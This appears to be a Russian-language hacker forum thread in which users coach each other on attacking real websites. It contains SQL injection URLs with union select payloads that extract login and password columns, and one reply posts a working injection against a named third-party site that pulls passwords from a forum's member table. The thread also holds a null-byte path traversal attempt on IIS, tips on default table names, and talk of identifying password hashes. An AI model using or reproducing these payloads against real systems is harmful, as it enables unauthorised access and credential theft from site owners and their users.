а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...
Это логин и хэш) если я не ошибаюсь =) Это я не знаю че за шифровка) А это Хэш MySQL =) Вот ТУТ FAQ по хэшам
вопрос по IIS и Microsoft .NET Framework Такой вопрос Есть уязвимость, точнее есть ошибка в скрипте при воде левых данных выводит Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected. тоесть в конце пути скрипт добавляет расширение ascx пробовал добавить %00 непомогло Подскажите плиз что делать
А почему все пользуются для поиска уязвимостей только гуглом че больше ни какие другие поисковики не принимают дополнительніх параметров Ну к примеру Yahoo я поьзуюсь только им в нем лучний результат
Яхо по гугловской базе берет, работает (индексирует) сайты, у гугля много фукций чем у яхы, командные запросы больше... Еще есть search.icq.com но они тоже совместно с гуглем...
Добрый вечер у меня вопрос по мускуль, нашел скуль и подобрал таблицу, немного погодя нашлись и колонки. Но когда делаю запрос www.site.ru/index.php?id=-1 union select 1,2,3,login,4,5,password,7 from admin/* То запрос то выполняется, а вот в ответе на страницы нечего нету ( ... С чем это может быть связанно? И можно ли это как то исправить?
Только учусь! Нашел скуль вида: http://site.com/index.php?loc=tourism&type=article&read_id=-2+union+select+1,2,3,4,5,6/* 4.1.22-standard-log:site_name@localhost:site_name_db Но при попытке подбирать таблицы выплевует: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 объясните пожалуйста, натолкните на варианты решения. Хотелось бы самому справиться но не получается. Всем, кто откликнется-СПАСИБО!!!
Значит не той таблицы который вы вставляете в запрос... Пробуйте до тех пор пока не найдете правильную таблицу
samarin - вы просто не правильно подбирали таблицы, вот ваш сайт _http://arhar.dn.ua/index.php?loc=tourism&read_id=-12+union+select+1,2,passwd,4,5,6+from+smf_members/*&start=0
Piflit я знаю видел что там зареганно 10к усеров, и еще не только таблица admin но также и другие. Мне не верится что все таблицы пустые (
KPOT_f!nd - Хотелось конечно самому разобраться, но Спасибо! Если не затруднит объясните откуда взяли именно это название таблицы(т.к я подбирал несколько часов и ни на что толковое не наткнулся), а вы за несколько минут...
2 ~Taxa~ если цифры из запроса выводятся то попробуй aes_decrypt(aes_encrypt(login,0x71),0x71) ну а чтобы Piflit не ругал меня можешь привести к char
smf_members - это стандартное название таблицы с префиксом по-умолчанию у форумов на движке simple machines. _http://someshit.net/as3f13asf21/ - стандартные таблицы движков, и поля к ним.
